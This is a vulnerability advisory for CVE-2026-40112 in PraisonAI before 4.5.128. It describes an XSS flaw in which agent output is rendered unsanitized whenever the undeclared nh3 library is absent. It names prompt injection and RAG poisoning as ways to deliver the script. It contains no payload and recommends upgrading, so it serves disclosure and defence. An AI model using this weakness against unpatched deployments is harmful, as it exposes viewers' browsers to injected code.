CVE-2026-40112

Name of the Vulnerable Software and Affected Versions PraisonAI versions prior to 4.5.128

Description PraisonAI is a multi-agent teams system. The Flask API endpoint in src/praisonai/api.py renders agent output as HTML without proper sanitization. The sanitize html function depends on the nh3 library, which is not a declared dependency. When nh3 is not installed, the sanitization process is bypassed, allowing an attacker to inject arbitrary JavaScript that executes in the browser of anyone viewing the API output. This can occur if an attacker can influence agent input through methods like RAG data poisoning, web scraping results, or prompt injection.

Recommendations Update PraisonAI to version 4.5.128 or later.